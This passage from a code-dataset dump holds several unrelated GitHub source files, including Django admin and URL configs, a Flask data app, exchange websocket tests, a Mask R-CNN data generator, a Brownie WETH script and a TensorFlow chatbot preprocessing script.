EventAdmin(admin.ModelAdmin):\n\tordering = ['event_time']\n\tdate_hierarchy = 'event_time'\n\tlist_display = ('event_time', 'beacon_addr', 'sniffer_serial')\n\tlist_display_links = ('event_time',)","repo_name":"PKmnman/Pawpharos-Web","sub_path":"app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"4210983106","text":"from flask import Flask, render_template, request\nfrom collections import Counter\nimport json\nimport pandas as pd\ndata = pd.read_csv('cleaned.csv')\n\napp = Flask(__name__)\ns_name = [i.lower() for i in list(data['State'])]\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n@app.route('/state/')\ndef state(name):\n if name.lower() in s_name:\n ids = s_name.index(name.lower())\n result = json.dumps({'State': data.iloc[ids]['State'], 'Age-adjusted incidence rate (cases per 100k)':data.iloc[ids]['Age-Adjusted Incidence Rate([rate note]) - cases per 100,000']})\n return result\n return 'not valid'\n\n@app.route(\"/info\", methods=[\"GET\"])\ndef analyze():\n usertext = request.args.get(\"usertext\")\n if usertext.lower() in s_name:\n ids = s_name.index(usertext.lower())\n result = json.dumps({'State': data.iloc[ids]['State'], 'Age-adjusted incidence rate (cases per 100k':data.iloc[ids]['Age-Adjusted Incidence Rate([rate note]) - cases per 100,000']})\n else:\n result = 'not valid'\n return render_template(\"analyze.html\", analysis=result, usertext=usertext)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, port = 8007)\n","repo_name":"VIcKII-Z/Computational-Methods","sub_path":"Assignment5/fl_demo.py","file_name":"fl_demo.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"37782247580","text":"import pytest\n\nimport pybotters_wrapper as pbw\nfrom pybotters_wrapper.core import WebsocketRequest\n\n\n@pytest.fixture\ndef public_send() -> list[str]:\n return [\n '42[\"join-room\",\"ticker_btc_jpy\"]',\n '42[\"join-room\",\"transactions_btc_jpy\"]',\n '42[\"join-room\",\"depth_whole_btc_jpy\"]',\n '42[\"join-room\",\"depth_diff_btc_jpy\"]',\n ]\n\n\ndef test_public(public_send):\n expected = [\n WebsocketRequest(\n \"wss://stream.bitbank.cc/socket.io/?EIO=2&transport=websocket\",\n public_send,\n )\n ]\n\n actual = (\n pbw.create_factory(\"bitbank\")\n .create_websocket_request_builder()\n .subscribe(\"public\", symbol=\"btc_jpy\")\n .get()\n )\n\n assert expected == actual\n\n\n@pytest.mark.asyncio\nasync def test_private():\n with pytest.raises(NotImplementedError):\n (\n pbw.create_factory(\"bitbank\")\n .create_websocket_request_builder()\n .subscribe(\"private\", symbol=\"btc_jpy\")\n .get()\n )\n\n\n@pytest.mark.asyncio\nasync def test_all():\n with pytest.raises(NotImplementedError):\n (\n pbw.create_factory(\"bitbank\")\n .create_websocket_request_builder()\n .subscribe(\"all\", symbol=\"btc_jpy\")\n .get()\n )\n","repo_name":"ko0hi/pybotters-wrapper","sub_path":"tests/bitbank/test_websocket_request_builder.py","file_name":"test_websocket_request_builder.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"27"} +{"seq_id":"4489699485","text":"from cs50 import get_int\n\n\ndef main():\n height = get_positive_int(\"Height: \")\n\n for i in range(height):\n j = height-1\n counter = 0\n while j >= 0:\n if i < j:\n print(\" 
\", end=\"\")\n else:\n print(\"#\", end=\"\")\n counter += 1\n\n j -= 1\n\n print(\" \", end=\"\")\n\n k = 0\n while k < counter:\n print(\"#\", end=\"\")\n k += 1\n\n print()\n\n\ndef get_positive_int(message):\n while True:\n value = get_int(message)\n if value > 0 and value < 9:\n break\n\n return value\n\n\nmain()\n","repo_name":"gabrielgoncalveso/cs50_exercises","sub_path":"pset6/mario/more/mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41283982169","text":"import matplotlib.pyplot as plt\n# %matplotlib inline\n\n# 그래프 데이터 \nsubject = ['English', 'Math', 'Korean', 'Science', 'Computer']\npoints = [40, 90, 50, 60, 100]\n\n# 축 그리기\nfig = plt.figure()\nax1 = fig.add_subplot(1,1,1)\n\n# 그래프 그리기\nax1.bar(subject, points)\n\n# 라벨, 타이틀 달기\nplt.xlabel('Subject')\nplt.ylabel('Points')\nplt.title(\"Yuna's Test Result\")\n\n# 보여주기\nplt.savefig('./barplot.png') # 그래프를 이미지로 출력\nplt.show() # 그래프를 화면으로 출력","repo_name":"leetaehwan/Workspace","sub_path":"Aiffel course/matplotlib_training.py","file_name":"matplotlib_training.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"3683630124","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.contrib.auth import views as auth_views\nimport maynardlabs.views as views\n\nurlpatterns = [\n # Examples:\n url(r'^$', views.index),\n url(r'home/', views.index),\n # url(r'^blog/', include('blog.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^blog/', views.blog),\n url(r'^podcasts/', views.podcast),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^members/login', auth_views.login, {'template_name': 'registration/login.html'}, name='login'),\n url(r'^members/logout', auth_views.logout, {'next_page': '/'}, name='logout'),\n url(r'^members/manageprofile', views.profile),\n url(r'^ckeditor/', include('ckeditor_uploader.urls')),\n url(r'^blogview/', views.blogview),\n]\n","repo_name":"jacobmaynard/maynardlabs","sub_path":"maynardlabs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71122758473","text":"import numpy as np\nimport logging\nimport skimage\nimport random\nfrom Utils.network_utils import compose_image_meta, compute_backbone_shapes\nfrom Utils.utils import resize_mask, resize_image, extract_bboxes, minimize_mask, generate_pyramid_anchors\nfrom model.Rpn import build_rpn_targets\nfrom model.Detection import build_detection_targets\n\ndef mold_image(images, config):\n \"\"\"Expects an RGB image (or array of images) and subtracts\n the mean pixel and converts it to float. Expects image\n colors in RGB order.\n \"\"\"\n return images.astype(np.float32) - config.MEAN_PIXEL\n\nclass Dataset(object):\n \"\"\"The base class for dataset classes.\n To use it, create a new class that adds functions specific to the dataset\n you want to use. 
For example:\n\n class CatsAndDogsDataset(Dataset):\n def load_cats_and_dogs(self):\n ...\n def load_mask(self, image_id):\n ...\n def image_reference(self, image_id):\n ...\n\n See COCODataset and ShapesDataset as examples.\n \"\"\"\n\n def __init__(self, class_map=None):\n self._image_ids = []\n self.image_info = []\n # Background is always the first class\n self.class_info = [{\"source\": \"\", \"id\": 0, \"name\": \"BG\"}]\n self.source_class_ids = {}\n\n def add_class(self, source, class_id, class_name):\n assert \".\" not in source, \"Source name cannot contain a dot\"\n # Does the class exist already?\n for info in self.class_info:\n if info['source'] == source and info[\"id\"] == class_id:\n # source.class_id combination already available, skip\n return\n # Add the class\n self.class_info.append({\n \"source\": source,\n \"id\": class_id,\n \"name\": class_name,\n })\n\n def add_image(self, source, image_id, path, **kwargs):\n image_info = {\n \"id\": image_id,\n \"source\": source,\n \"path\": path,\n }\n image_info.update(kwargs)\n self.image_info.append(image_info)\n\n def image_reference(self, image_id):\n \"\"\"Return a link to the image in its source Website or details about\n the image that help looking it up or debugging it.\n\n Override for your dataset, but pass to this function\n if you encounter images not in your dataset.\n \"\"\"\n return \"\"\n\n def prepare(self, class_map=None):\n \"\"\"Prepares the Dataset class for use.\n\n TODO: class map is not supported yet. When done, it should handle mapping\n classes from different datasets to the same class ID.\n \"\"\"\n\n def clean_name(name):\n \"\"\"Returns a shorter version of object names for cleaner display.\"\"\"\n return \",\".join(name.split(\",\")[:1])\n\n # Build (or rebuild) everything else from the info dicts.\n self.num_classes = len(self.class_info)\n self.class_ids = np.arange(self.num_classes)\n self.class_names = [clean_name(c[\"name\"]) for c in self.class_info]\n self.num_images = len(self.image_info)\n self._image_ids = np.arange(self.num_images)\n\n # Mapping from source class and image IDs to internal IDs\n self.class_from_source_map = {\"{}.{}\".format(info['source'], info['id']): id\n for info, id in zip(self.class_info, self.class_ids)}\n self.image_from_source_map = {\"{}.{}\".format(info['source'], info['id']): id\n for info, id in zip(self.image_info, self.image_ids)}\n\n # Map sources to class_ids they support\n self.sources = list(set([i['source'] for i in self.class_info]))\n self.source_class_ids = {}\n # Loop over datasets\n for source in self.sources:\n self.source_class_ids[source] = []\n # Find classes that belong to this dataset\n for i, info in enumerate(self.class_info):\n # Include BG class in all datasets\n if i == 0 or source == info['source']:\n self.source_class_ids[source].append(i)\n\n def map_source_class_id(self, source_class_id):\n \"\"\"Takes a source class ID and returns the int class ID assigned to it.\n\n For example:\n dataset.map_source_class_id(\"coco.12\") -> 23\n \"\"\"\n return self.class_from_source_map[source_class_id]\n\n def get_source_class_id(self, class_id, source):\n \"\"\"Map an internal class ID to the corresponding class ID in the source dataset.\"\"\"\n info = self.class_info[class_id]\n assert info['source'] == source\n return info['id']\n\n @property\n def image_ids(self):\n return self._image_ids\n\n def source_image_link(self, image_id):\n \"\"\"Returns the path or URL to the image.\n Override this to return a URL to the image if it's available 
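prepare() below keys classes by "source.id" so that, for example, map_source_class_id("coco.12") resolves to an internal contiguous id shared across merged datasets. A toy illustration of that mapping (my example data, not from the record):

class_info = [{"source": "", "id": 0, "name": "BG"},
              {"source": "coco", "id": 12, "name": "dog"}]
class_ids = list(range(len(class_info)))
class_from_source_map = {f"{info['source']}.{info['id']}": cid
                         for info, cid in zip(class_info, class_ids)}
assert class_from_source_map["coco.12"] == 1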
online for easy\n debugging.\n \"\"\"\n return self.image_info[image_id][\"path\"]\n\n def load_image(self, image_id):\n \"\"\"Load the specified image and return a [H,W,3] Numpy array.\n \"\"\"\n # Load image\n image = skimage.io.imread(self.image_info[image_id]['path'])\n # If grayscale. Convert to RGB for consistency.\n if image.ndim != 3:\n image = skimage.color.gray2rgb(image)\n # If has an alpha channel, remove it for consistency\n if image.shape[-1] == 4:\n image = image[..., :3]\n return image\n\n def load_mask(self, image_id):\n \"\"\"Load instance masks for the given image.\n\n Different datasets use different ways to store masks. Override this\n method to load instance masks and return them in the form of am\n array of binary masks of shape [height, width, instances].\n\n Returns:\n masks: A bool array of shape [height, width, instance count] with\n a binary mask per instance.\n class_ids: a 1D array of class IDs of the instance masks.\n \"\"\"\n # Override this function to load a mask from your dataset.\n # Otherwise, it returns an empty mask.\n logging.warning(\"You are using the default load_mask(), maybe you need to define your own one.\")\n mask = np.empty([0, 0, 0])\n class_ids = np.empty([0], np.int32)\n return mask, class_ids\n\ndef load_image_gt(dataset, config, image_id, augment=False, augmentation=None, use_mini_mask=False):\n \"\"\"Load and return ground truth data for an image (image, mask, bounding boxes).\n\n augment: (deprecated. Use augmentation instead). If true, apply random\n image augmentation. Currently, only horizontal flipping is offered.\n augmentation: Optional. An imgaug (https://github.com/aleju/imgaug) augmentation.\n For example, passing imgaug.augmenters.Fliplr(0.5) flips images\n right/left 50% of the time.\n use_mini_mask: If False, returns full-size masks that are the same height\n and width as the original image. These can be big, for example\n 1024x1024x100 (for 100 instances). Mini masks are smaller, typically,\n 224x224 and are generated by extracting the bounding box of the\n object and resizing it to MINI_MASK_SHAPE.\n\n Returns:\n image: [height, width, 3]\n shape: the original shape of the image before resizing and cropping.\n class_ids: [instance_count] Integer class IDs\n bbox: [instance_count, (y1, x1, y2, x2)]\n mask: [height, width, instance_count]. The height and width are those\n of the image unless use_mini_mask is True, in which case they are\n defined in MINI_MASK_SHAPE.\n \"\"\"\n # Load image and mask\n image = dataset.load_image(image_id)\n mask, class_ids = dataset.load_mask(image_id)\n\n original_shape = image.shape\n image, window, scale, padding, crop = resize_image(\n image,\n min_dim=config.IMAGE_MIN_DIM,\n min_scale=config.IMAGE_MIN_SCALE,\n max_dim=config.IMAGE_MAX_DIM,\n mode=config.IMAGE_RESIZE_MODE)\n mask = resize_mask(mask, scale, padding, crop)\n\n if augment:\n logging.warning(\"'augment' is deprecated. 
Use 'augmentation' instead.\")\n if random.randint(0, 1):\n image = np.fliplr(image)\n mask = np.fliplr(mask)\n\n # Augmentation\n # This requires the imgaug lib (https://github.com/aleju/imgaug)\n if augmentation:\n import imgaug\n\n # Augmenters that are safe to apply to masks\n # Some, such as Affine, have settings that make them unsafe, so always\n # test your augmentation on masks\n MASK_AUGMENTERS = [\"Sequential\", \"SomeOf\", \"OneOf\", \"Sometimes\",\n \"Fliplr\", \"Flipud\", \"CropAndPad\",\n \"Affine\", \"PiecewiseAffine\"]\n\n def hook(images, augmenter, parents, default):\n \"\"\"Determines which augmenters to apply to masks.\"\"\"\n return augmenter.__class__.__name__ in MASK_AUGMENTERS\n\n # Store shapes before augmentation to compare\n image_shape = image.shape\n mask_shape = mask.shape\n # Make augmenters deterministic to apply similarly to images and masks\n det = augmentation.to_deterministic()\n image = det.augment_image(image)\n # Change mask to np.uint8 because imgaug doesn't support np.bool\n mask = det.augment_image(mask.astype(np.uint8), hooks=imgaug.HooksImages(activator=hook))\n\n # Verify that shapes didn't change\n assert image.shape == image_shape, \"Augmentation shouldn't change image size\"\n assert mask.shape == mask_shape, \"Augmentation shouldn't change mask size\"\n # Change mask back to bool\n mask = mask.astype(np.bool)\n\n # Note that some boxes might be all zeros if the corresponding mask got cropped out.\n # and here is to filter them out\n _idx = np.sum(mask, axis=(0, 1)) > 0\n mask = mask[:, :, _idx]\n class_ids = class_ids[_idx]\n # Bounding boxes. Note that some boxes might be all zeros\n # if the corresponding mask got cropped out.\n # bbox: [num_instances, (y1, x1, y2, x2)]\n bbox = extract_bboxes(mask)\n\n # Active classes\n # Different datasets have different classes, so track the\n # classes supported in the dataset of this image.\n active_class_ids = np.zeros([dataset.num_classes], dtype=np.int32)\n source_class_ids = dataset.source_class_ids[dataset.image_info[image_id][\"source\"]]\n active_class_ids[source_class_ids] = 1\n\n # Resize masks to smaller size to reduce memory usage\n if use_mini_mask:\n mask = minimize_mask(bbox, mask, config.MINI_MASK_SHAPE)\n\n # Image meta data\n image_meta = compose_image_meta(image_id, original_shape, image.shape, window, scale, active_class_ids)\n\n return image, image_meta, class_ids, bbox, mask\n\ndef data_generator(dataset, config, shuffle=True, augment=False, augmentation=None,\n random_rois=0, batch_size=1, detection_targets=False,\n no_augmentation_sources=None):\n \"\"\"A generator that returns images and corresponding target class ids,\n bounding box deltas, and masks.\n\n dataset: The Dataset object to pick data from\n config: The model config object\n shuffle: If True, shuffles the samples before every epoch\n augment: (deprecated. Use augmentation instead). If true, apply random\n image augmentation. Currently, only horizontal flipping is offered.\n augmentation: Optional. An imgaug (https://github.com/aleju/imgaug) augmentation.\n For example, passing imgaug.augmenters.Fliplr(0.5) flips images\n right/left 50% of the time.\n random_rois: If > 0 then generate proposals to be used to train the\n network classifier and mask heads. Useful if training\n the Mask RCNN part without the RPN.\n batch_size: How many images to return in each call\n detection_targets: If True, generate detection targets (class IDs, bbox\n deltas, and masks). 
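\n A minimal sketch of the deterministic-augmentation pattern used in load_image_gt() above (a hedged example, not part of the original file; the Fliplr augmenter and array shapes are illustrative assumptions): to_deterministic() freezes the sampled parameters so image and mask receive the exact same transform.\n import imgaug.augmenters as iaa\n aug = iaa.Fliplr(1.0).to_deterministic() # always flip, for a reproducible check\n img = np.arange(12, dtype=np.uint8).reshape(3, 4)\n msk = (img % 2).astype(np.uint8)\n assert (aug.augment_image(img) == img[:, ::-1]).all()\n assert (aug.augment_image(msk) == msk[:, ::-1]).all() # mask flipped identically\n 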
Typically for debugging or visualizations because\n in training, detection targets are generated by DetectionTargetLayer.\n no_augmentation_sources: Optional. List of sources to exclude for\n augmentation. A source is a string that identifies a dataset and is\n defined in the Dataset class.\n\n Returns a Python generator. Upon calling next() on it, the\n generator returns two lists, inputs and outputs. The contents\n of the lists differ depending on the received arguments:\n inputs list:\n - images: [batch, H, W, C]\n - image_meta: [batch, (meta data)] Image details. See compose_image_meta()\n - rpn_match: [batch, N] Integer (1=positive anchor, -1=negative, 0=neutral)\n - rpn_bbox: [batch, N, (dy, dx, log(dh), log(dw))] Anchor bbox deltas.\n - gt_class_ids: [batch, MAX_GT_INSTANCES] Integer class IDs\n - gt_boxes: [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)]\n - gt_masks: [batch, height, width, MAX_GT_INSTANCES]. The height and width\n are those of the image unless use_mini_mask is True, in which\n case they are defined in MINI_MASK_SHAPE.\n\n outputs list: Usually empty in regular training. But if detection_targets\n is True then the outputs list contains target class_ids, bbox deltas,\n and masks.\n \"\"\"\n b = 0 # batch item index\n image_index = -1\n image_ids = np.copy(dataset.image_ids)\n error_count = 0\n no_augmentation_sources = no_augmentation_sources or []\n\n # Anchors\n # [anchor_count, (y1, x1, y2, x2)]\n backbone_shapes = compute_backbone_shapes(config, config.IMAGE_SHAPE)\n anchors = generate_pyramid_anchors(config.RPN_ANCHOR_SCALES,\n config.RPN_ANCHOR_RATIOS,\n backbone_shapes,\n config.BACKBONE_STRIDES,\n config.RPN_ANCHOR_STRIDE)\n\n # Keras requires a generator to run indefinitely.\n while True:\n try:\n # Increment index to pick next image. Shuffle if at the start of an epoch.\n image_index = (image_index + 1) % len(image_ids)\n if shuffle and image_index == 0:\n np.random.shuffle(image_ids)\n\n # Get GT bounding boxes and masks for image.\n image_id = image_ids[image_index]\n\n # If the image source is not to be augmented, pass None as augmentation\n if dataset.image_info[image_id]['source'] in no_augmentation_sources:\n image, image_meta, gt_class_ids, gt_boxes, gt_masks = load_image_gt(dataset, config, image_id,\n augment=augment,\n augmentation=None,\n use_mini_mask=config.USE_MINI_MASK)\n else:\n image, image_meta, gt_class_ids, gt_boxes, gt_masks = load_image_gt(dataset, config, image_id,\n augment=augment,\n augmentation=augmentation,\n use_mini_mask=config.USE_MINI_MASK)\n\n # Skip images that have no instances. 
This can happen in cases\n # where we train on a subset of classes and the image doesn't\n # have any of the classes we care about.\n if not np.any(gt_class_ids > 0):\n continue\n\n # RPN Targets\n rpn_match, rpn_bbox = build_rpn_targets(image.shape, anchors, gt_class_ids, gt_boxes, config)\n\n # Mask R-CNN Targets\n if random_rois:\n rpn_rois = generate_random_rois(image.shape, random_rois, gt_class_ids, gt_boxes)\n if detection_targets:\n rois, mrcnn_class_ids, mrcnn_bbox, mrcnn_mask = build_detection_targets(\n rpn_rois, gt_class_ids, gt_boxes, gt_masks, config)\n\n # Init batch arrays\n if b == 0:\n batch_image_meta = np.zeros((batch_size,) + image_meta.shape, dtype=image_meta.dtype)\n batch_rpn_match = np.zeros([batch_size, anchors.shape[0], 1], dtype=rpn_match.dtype)\n batch_rpn_bbox = np.zeros([batch_size, config.RPN_TRAIN_ANCHORS_PER_IMAGE, 4], dtype=rpn_bbox.dtype)\n batch_images = np.zeros((batch_size,) + image.shape, dtype=np.float32)\n batch_gt_class_ids = np.zeros((batch_size, config.MAX_GT_INSTANCES), dtype=np.int32)\n batch_gt_boxes = np.zeros((batch_size, config.MAX_GT_INSTANCES, 4), dtype=np.int32)\n batch_gt_masks = np.zeros((batch_size, gt_masks.shape[0], gt_masks.shape[1],\n config.MAX_GT_INSTANCES), dtype=gt_masks.dtype)\n if random_rois:\n batch_rpn_rois = np.zeros((batch_size, rpn_rois.shape[0], 4), dtype=rpn_rois.dtype)\n if detection_targets:\n batch_rois = np.zeros((batch_size,) + rois.shape, dtype=rois.dtype)\n batch_mrcnn_class_ids = np.zeros((batch_size,) + mrcnn_class_ids.shape, dtype=mrcnn_class_ids.dtype)\n batch_mrcnn_bbox = np.zeros((batch_size,) + mrcnn_bbox.shape, dtype=mrcnn_bbox.dtype)\n batch_mrcnn_mask = np.zeros((batch_size,) + mrcnn_mask.shape, dtype=mrcnn_mask.dtype)\n\n # If more instances than fits in the array, sub-sample from them.\n if gt_boxes.shape[0] > config.MAX_GT_INSTANCES:\n ids = np.random.choice(np.arange(gt_boxes.shape[0]), config.MAX_GT_INSTANCES, replace=False)\n gt_class_ids = gt_class_ids[ids]\n gt_boxes = gt_boxes[ids]\n gt_masks = gt_masks[:, :, ids]\n\n # Add to batch\n batch_image_meta[b] = image_meta\n batch_rpn_match[b] = rpn_match[:, np.newaxis]\n batch_rpn_bbox[b] = rpn_bbox\n batch_images[b] = mold_image(image.astype(np.float32), config)\n batch_gt_class_ids[b, :gt_class_ids.shape[0]] = gt_class_ids\n batch_gt_boxes[b, :gt_boxes.shape[0]] = gt_boxes\n batch_gt_masks[b, :, :, :gt_masks.shape[-1]] = gt_masks\n if random_rois:\n batch_rpn_rois[b] = rpn_rois\n if detection_targets:\n batch_rois[b] = rois\n batch_mrcnn_class_ids[b] = mrcnn_class_ids\n batch_mrcnn_bbox[b] = mrcnn_bbox\n batch_mrcnn_mask[b] = mrcnn_mask\n b += 1\n\n # Batch full?\n if b >= batch_size:\n inputs = [batch_images, batch_image_meta, batch_rpn_match, batch_rpn_bbox,\n batch_gt_class_ids, batch_gt_boxes, batch_gt_masks]\n outputs = []\n\n if random_rois:\n inputs.extend([batch_rpn_rois])\n if detection_targets:\n inputs.extend([batch_rois])\n # Keras requires that output and targets have the same number of dimensions\n batch_mrcnn_class_ids = np.expand_dims(batch_mrcnn_class_ids, -1)\n outputs.extend([batch_mrcnn_class_ids, batch_mrcnn_bbox, batch_mrcnn_mask])\n\n yield inputs, outputs\n\n # start a new batch\n b = 0\n except (GeneratorExit, KeyboardInterrupt):\n raise\n except:\n # Log it and skip the image\n logging.exception(\"Error processing image {}\".format(dataset.image_info[image_id]))\n error_count += 1\n if error_count > 5:\n raise\n\ndef generate_random_rois(image_shape, count, gt_class_ids, gt_boxes):\n \"\"\"Generates ROI proposals 
similar to what a region proposal network would generate.\n\n image_shape: [Height, Width, Depth]\n count: Number of ROIs to generate\n gt_class_ids: [N] Integer ground truth class IDs\n gt_boxes: [N, (y1, x1, y2, x2)] Ground truth boxes in pixels.\n\n Returns: [count, (y1, x1, y2, x2)] ROI boxes in pixels.\n \"\"\"\n # placeholder\n rois = np.zeros((count, 4), dtype=np.int32)\n\n # Generate random ROIs around GT boxes (90% of count)\n rois_per_box = int(0.9 * count / gt_boxes.shape[0])\n for i in range(gt_boxes.shape[0]):\n gt_y1, gt_x1, gt_y2, gt_x2 = gt_boxes[i]\n h = gt_y2 - gt_y1\n w = gt_x2 - gt_x1\n # random boundaries\n r_y1 = max(gt_y1 - h, 0)\n r_y2 = min(gt_y2 + h, image_shape[0])\n r_x1 = max(gt_x1 - w, 0)\n r_x2 = min(gt_x2 + w, image_shape[1])\n\n # To avoid generating boxes with zero area, we generate double what\n # we need and filter out the extra. If we get fewer valid boxes\n # than we need, we loop and try again.\n while True:\n y1y2 = np.random.randint(r_y1, r_y2, (rois_per_box * 2, 2))\n x1x2 = np.random.randint(r_x1, r_x2, (rois_per_box * 2, 2))\n # Filter out zero area boxes\n threshold = 1\n y1y2 = y1y2[np.abs(y1y2[:, 0] - y1y2[:, 1]) >= threshold][:rois_per_box]\n x1x2 = x1x2[np.abs(x1x2[:, 0] - x1x2[:, 1]) >= threshold][:rois_per_box]\n if y1y2.shape[0] == rois_per_box and x1x2.shape[0] == rois_per_box:\n break\n\n # Sort on axis 1 to ensure x1 <= x2 and y1 <= y2 and then reshape\n # into x1, y1, x2, y2 order\n x1, x2 = np.split(np.sort(x1x2, axis=1), 2, axis=1)\n y1, y2 = np.split(np.sort(y1y2, axis=1), 2, axis=1)\n box_rois = np.hstack([y1, x1, y2, x2])\n rois[rois_per_box * i:rois_per_box * (i + 1)] = box_rois\n\n # Generate random ROIs anywhere in the image (10% of count)\n remaining_count = count - (rois_per_box * gt_boxes.shape[0])\n # To avoid generating boxes with zero area, we generate double what\n # we need and filter out the extra. 
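\n # A tiny NumPy check (a hedged sketch; the pair values are arbitrary) of the\n # sort-then-split trick used here: sorting each pair along axis 1 guarantees\n # x1 <= x2 and y1 <= y2 before hstack assembles (y1, x1, y2, x2) boxes.\n # demo = np.array([[7, 2], [3, 9]])\n # lo, hi = np.split(np.sort(demo, axis=1), 2, axis=1)\n # # lo -> [[2], [3]], hi -> [[7], [9]]\n # 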
If we get fewer valid boxes\n # than we need, we loop and try again.\n while True:\n y1y2 = np.random.randint(0, image_shape[0], (remaining_count * 2, 2))\n x1x2 = np.random.randint(0, image_shape[1], (remaining_count * 2, 2))\n # Filter out zero area boxes\n threshold = 1\n y1y2 = y1y2[np.abs(y1y2[:, 0] - y1y2[:, 1]) >= threshold][:remaining_count]\n x1x2 = x1x2[np.abs(x1x2[:, 0] - x1x2[:, 1]) >= threshold][:remaining_count]\n if y1y2.shape[0] == remaining_count and x1x2.shape[0] == remaining_count:\n break\n\n # Sort on axis 1 to ensure x1 <= x2 and y1 <= y2 and then reshape\n # into x1, y1, x2, y2 order\n x1, x2 = np.split(np.sort(x1x2, axis=1), 2, axis=1)\n y1, y2 = np.split(np.sort(y1y2, axis=1), 2, axis=1)\n global_rois = np.hstack([y1, x1, y2, x2])\n rois[-remaining_count:] = global_rois\n return rois\n\nif __name__ == '__main__':\n from data.CustomDataset import ShapesDataset\n from Config.CustomConfig import ShapesConfig\n import numpy as np\n from Utils.network_utils import parse_image_meta_graph\n\n config = ShapesConfig()\n\n dataset_train = ShapesDataset()\n dataset_train.load_shapes(500, config.IMAGE_SHAPE[0], config.IMAGE_SHAPE[1])\n dataset_train.prepare()\n\n image, image_meta, gt_class_ids, gt_boxes, gt_masks = load_image_gt(dataset_train, config, 0,\n augment=False,\n augmentation=None,\n use_mini_mask=True)\n\n print(parse_image_meta_graph(np.array([image_meta])))\n\n # train_generator = data_generator(dataset_train, config, shuffle=True,\n # augmentation=None,\n # batch_size=config.BATCH_SIZE,\n # no_augmentation_sources=None)\n # input, output = next(train_generator)\n # print(len(input), len(output))\n","repo_name":"bladesaber/maskrcnn","sub_path":"data/DataGenerator.py","file_name":"DataGenerator.py","file_ext":"py","file_size_in_byte":24152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"38311475573","text":"from scripts.helpfulFunctions import getAccount\nfrom brownie import interface, config, network\n\n\ndef main():\n getWETH()\n\n\ndef getWETH():\n \"\"\"\n Mints WETH by depositing ETH.\n \"\"\"\n account = getAccount()\n weth = interface.IWeth(config[\"networks\"][network.show_active()][\"weth_erc20\"])\n tranx = weth.deposit({\"from\": account, \"value\": 0.1 * (10 ** 18)})\n tranx.wait(1)\n print(\"Received 0.1 WETH\")\n return tranx\n","repo_name":"SyncCode2017/AAVE_INTERACT_BROWNIE.PY","sub_path":"scripts/getWETH.py","file_name":"getWETH.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"21453428497","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport tensorflow as tf\ntf.random.set_seed(1234)\n\nimport tensorflow_datasets as tfds\n\nimport os\nimport re\nimport sys\nimport numpy as np\n\n\"\"\"##Prepare Dataset\n\nWe will use the conversations in movies and TV shows provided by [Cornell Movie-Dialogs Corpus](https://www.cs.cornell.edu/~cristian/Cornell_Movie-Dialogs_Corpus.html), which contains more than 220 thousand conversational exchanges between more than 10k pairs of movie characters, as our dataset.\n\n`movie_conversations.txt` contains a list of the conversation IDs and `movie_lines.txt` contains the text associated with each conversation ID. 
For further information regarding the dataset, please check the README file in the zip file.\n\"\"\"\n\ndata_name = \"trump\"\nnew_training = True\nVALIDATION_SIZE = 20\nEPOCHS = 80\nMAX_LENGTH = 100\n\npath_to_training_data = 'model_training/trump_response_pairs.txt'\n\n\"\"\"### Load and preprocess data\n\nTo keep this example simple and fast, we limit the maximum sentence length to `MAX_LENGTH=100` tokens (the `MAX_SAMPLES` cap from the original tutorial is currently not used).\n\nWe preprocess our dataset in the following order:\n* Extract conversation pairs into lists of `questions` and `answers`.\n* Preprocess each sentence by removing special characters.\n* Build tokenizer (map text to ID and ID to text) using [TensorFlow Datasets SubwordTextEncoder](https://www.tensorflow.org/datasets/api_docs/python/tfds/features/text/SubwordTextEncoder).\n* Tokenize each sentence and add `START_TOKEN` and `END_TOKEN` to indicate the start and end of each sentence.\n* Filter out sentences that have more than `MAX_LENGTH` tokens.\n* Pad tokenized sentences to `MAX_LENGTH`.\n\"\"\"\n\n# Maximum number of samples to preprocess, currently not being used\n# MAX_SAMPLES = 50000\n\ndef preprocess_sentence(sentence):\n sentence = sentence.lower().strip()\n # creating a space between a word and the punctuation following it\n # eg: \"he is a boy.\" => \"he is a boy .\"\n sentence = re.sub(r\"([?.!,])\", r\" \\1 \", sentence)\n sentence = re.sub(r'[\" \"]+', \" \", sentence)\n # replacing everything with space except (a-z, A-Z, \".\", \"?\", \"!\", \",\")\n sentence = re.sub(r\"[^a-zA-Z?.!,]+\", \" \", sentence)\n sentence = sentence.strip()\n # start and end tokens are added later, in tokenize_and_filter()\n return sentence\n\n\ndef load_conversations():\n # read alternating question/answer lines from the training file\n inputs, outputs = [], []\n with open(path_to_training_data) as f:\n line = f.readline()\n while line:\n inputs.append(preprocess_sentence(line))\n line = f.readline()\n outputs.append(preprocess_sentence(line))\n line = f.readline()\n \n return inputs, outputs\n\nprint(\"Loading, preprocessing, and tokenizing training data.\")\n\nquestions, answers = load_conversations()\n\n#print('Sample question: {}'.format(questions[20]))\n#print('Sample answer: {}'.format(answers[20]))\n\n# Build tokenizer using tfds for both questions and answers\ntokenizer = tfds.features.text.SubwordTextEncoder.build_from_corpus(\n questions + answers, target_vocab_size=2**13)\n\n# Define start and end token to indicate the start and end of a sentence\nSTART_TOKEN, 